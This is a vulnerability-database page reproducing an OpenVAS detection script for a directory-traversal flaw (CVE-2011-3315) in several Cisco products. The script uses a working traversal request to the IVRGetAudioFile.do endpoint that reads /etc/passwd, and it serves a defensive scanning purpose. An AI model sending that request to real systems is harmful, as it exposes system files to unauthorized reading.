Lucene search
K

Multiple Cisco Products 'file' Parameter () Directory Traversal Vulnerability

🗓️ 26 Jan 2012 00:00:00Reported by This script is Copyright (C) 2012 Greenbone Networks GmbHType 
openvas
 openvas
🔗 plugins.openvas.org👁 24 Views

Multiple Cisco Products 'file' Parameter () Directory Traversal Vulnerability. Attacker can read arbitrary files, leading to further attacks

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-3315
26 Oct 201100:00
circl
Cisco
Cisco Unified Communications Manager Directory Traversal Vulnerability
26 Oct 201116:00
cisco
Cisco
Cisco Unified Contact Center Express Directory Traversal Vulnerability
26 Oct 201116:00
cisco
CVE
CVE-2011-3315
27 Oct 201121:00
cve
Cvelist
CVE-2011-3315
27 Oct 201121:00
cvelist
Nuclei
Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
4 Jun 202603:48
nuclei
NVD
CVE-2011-3315
27 Oct 201121:55
nvd
OpenVAS
Multiple Cisco Products 'file' Parameter () Directory Traversal Vulnerability
26 Jan 201200:00
openvas
Prion
Directory traversal
27 Oct 201121:55
prion
RedhatCVE
CVE-2011-3315
22 May 202509:56
redhatcve
Rows per page
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_cisco_multiple_products_50372.nasl 5940 2017-04-12 09:02:05Z teissa $
#
# Multiple Cisco Products 'file' Parameter () Directory Traversal Vulnerability
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_summary = "Multiple Cisco products are prone to a directory-traversal
vulnerability.

Exploiting this issue will allow an attacker to read arbitrary files
from locations outside of the application's current directory. This
could help the attacker launch further attacks.

This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.

The following products are affected:

Cisco Unified IP Interactive Voice Response Cisco Unified Contact
Center Express Cisco Unified Communications Manager";

tag_solution = "Vendor updates are available. Please see the references for details.";

if (description)
{
 script_id(103402);
 script_bugtraq_id(50372);
 script_cve_id("CVE-2011-3315");
 script_tag(name:"cvss_base", value:"7.8");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
 script_version ("$Revision: 5940 $");

 script_name("Multiple Cisco Products 'file' Parameter () Directory Traversal Vulnerability");

 script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/50372");
 script_xref(name : "URL" , value : "http://www.cisco.com");
 script_xref(name : "URL" , value : "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm");
 script_xref(name : "URL" , value : "http://www.securityfocus.com/archive/1/520414");
 script_xref(name : "URL" , value : "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx");

 script_tag(name:"last_modification", value:"$Date: 2017-04-12 11:02:05 +0200 (Wed, 12 Apr 2017) $");
 script_tag(name:"creation_date", value:"2012-01-26 15:59:27 +0100 (Thu, 26 Jan 2012)");
 script_category(ACT_ATTACK);
 script_tag(name:"qod_type", value:"remote_vul");
 script_family("CISCO");
 script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
 script_dependencies("find_service.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
   
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

url = string("/"); 

if(http_vuln_check(port:port, url:url,pattern:"cisco")) {

  url = "/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd";

  if(http_vuln_check(port:port, url:url,pattern:"root:.*:0:[01]:")) {
     
    security_message(port:port);
    exit(0);

  }  

}

exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Apr 2017 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.51148
24